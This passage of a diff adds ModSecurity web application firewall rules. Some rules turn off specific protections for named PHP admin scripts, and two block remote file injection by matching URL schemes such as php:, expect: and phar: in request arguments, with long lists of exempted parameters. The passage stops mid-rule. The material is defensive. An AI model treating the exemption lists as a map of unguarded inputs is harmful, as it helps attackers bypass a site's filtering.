+SecRule REQUEST_FILENAME "/sg_saveentry\.php" "phase:2,id:91741,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/admin_content_config\.php" "phase:2,id:91742,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/credit_log2\.php" "phase:2,id:91743,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/folio-edit\.php" "phase:2,id:91744,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:91745,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:91746,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340814,ctl:ruleRemovebyID=340813,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/livezilla/server\.php" "phase:2,id:91747,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/flvprovider\.php" "phase:2,id:91748,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/subscribe_user2group\.php" "phase:2,id:91749,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/editcontent_process\.php" "phase:2,id:91750,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/select_category\.php" "phase:2,id:91751,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/acp/options\.php" "phase:2,id:91752,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149"
+
+SecRule REQUEST_FILENAME "/editroster\.php" "phase:2,id:91753,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/process\.php" "phase:2,id:91754,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91755,t:none,pass,nolog,skipAfter:END_RULES_91755"
+
+SecRule REQUEST_URI|ARGS|!ARGS:fu|!ARGS:/text/|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cforms/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:theme|!ARGS:returnBond|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:media|!ARGS:parent_name|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:/blog/|!ARGS:/video/|!ARGS:/^field1/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:importremote|!ARGS:/callback/|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:akID[46][value]|!ARGS:setmedia|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:/callback/|!ARGS:subject|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:search_string|!ARGS:direct|!ARGS:yt_thumb|!ARGS:fflv|!ARGS:direct|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:user_mail_register_no_approval_required_body|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:/click/|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:notification_body|!ARGS:/^product_long_/|!ARGS:/^topic_content_/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:desc|!ARGS:descripcion|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/txt/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:hostname|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:newDesc|!ARGS:/return/|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:/help/|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:request_uri|!ARGS:google|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:vars[DBhostname]|!ARGS:postvars|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:replycontents|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:team[logo]|!ARGS:return|!ARGS:ureferrer|!ARGS:basehref|!ARGS:/^redirect/|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:missing_fields_redirect|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:g2_return|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:ret|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:dynafield[_SIGNATURE]|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:map_description_1|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:field5|!ARGS:p_content|!ARGS:CANCEL_RETURN|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:330162,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:fu|!ARGS:/text/|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cforms/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:theme|!ARGS:returnBond|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:media|!ARGS:parent_name|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:/blog/|!ARGS:/video/|!ARGS:/^field1/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:importremote|!ARGS:/callback/|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:akID[46][value]|!ARGS:setmedia|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:/callback/|!ARGS:subject|!ARGS:pic|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:search_string|!ARGS:direct|!ARGS:yt_thumb|!ARGS:fflv|!ARGS:direct|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:user_mail_register_no_approval_required_body|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:/youtube/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:pic1|!ARGS:/click/|!ARGS:rf|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:Stream|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:notification_body|!ARGS:/^product_long_/|!ARGS:/^topic_content_/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:address|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:desc|!ARGS:descripcion|!ARGS:/^field_id_/|!ARGS:wpUploadDescription|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/txt/|!ARGS:whereto|!ARGS:/description/|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:hostname|!ARGS:/virtual_http_path/|!ARGS:/virtual_https_path/|!ARGS:f_content|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:RTServerName|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:thumb|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:forum_desc|!ARGS:file_contents|!ARGS:newDesc|!ARGS:/return/|!ARGS:Stream|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:/^fields_prev/|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:/help/|!ARGS:short_story|!ARGS:intro_content|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:fulldescr|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:request_uri|!ARGS:google|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:from_href|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:ppicture|!ARGS:paypal_ipn|!ARGS:defaultImage|!ARGS:title|!ARGS:dbody|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:/^blockbody/|!ARGS:field11|!ARGS:field_id_7|!ARGS:/^ViewState/|!ARGS:vars[DBhostname]|!ARGS:postvars|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:full_story|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:ret_address|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:/http_script_dir/|!ARGS:cfgfilecontent|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:flds[Message]|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:replycontents|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:ecards_more_pic_target|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:terms_content|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:wpau-ftphost|!ARGS:gen_header|!ARGS:button_dir|!ARGS:news_desc|!ARGS:x_organizational|!ARGS:href|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/^rss/|!ARGS:/rss$/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:team[logo]|!ARGS:return|!ARGS:ureferrer|!ARGS:basehref|!ARGS:/^redirect/|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:portal_body|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:body|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:missing_fields_redirect|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:src|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:g2_return|!ARGS:goto|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^http/|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:hamechalets_desc|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:description|!ARGS:ret|!ARGS:newDescription|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:Store_OUI_GlobalFooter|!ARGS:in[http]|!ARGS:dynafield[_SIGNATURE]|!ARGS:virtual_http_path|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/^virtual_http/|!ARGS:cta_content|!ARGS:map_description_1|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:field5|!ARGS:p_content|!ARGS:CANCEL_RETURN|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:330163,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91755
+
+SecRule REQUEST_FILENAME "/properties\.php" "phase:2,id:91756,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/db_update\.php" "phase:2,id:91757,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/prodadd\.php" "phase:2,id:91758,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/mt\.fcgi" "phase:2,id:91759,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91760,t:none,pass,nolog,skipAfter:END_RULES_91760"
+
+SecRule ARGS|!ARGS:text|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:b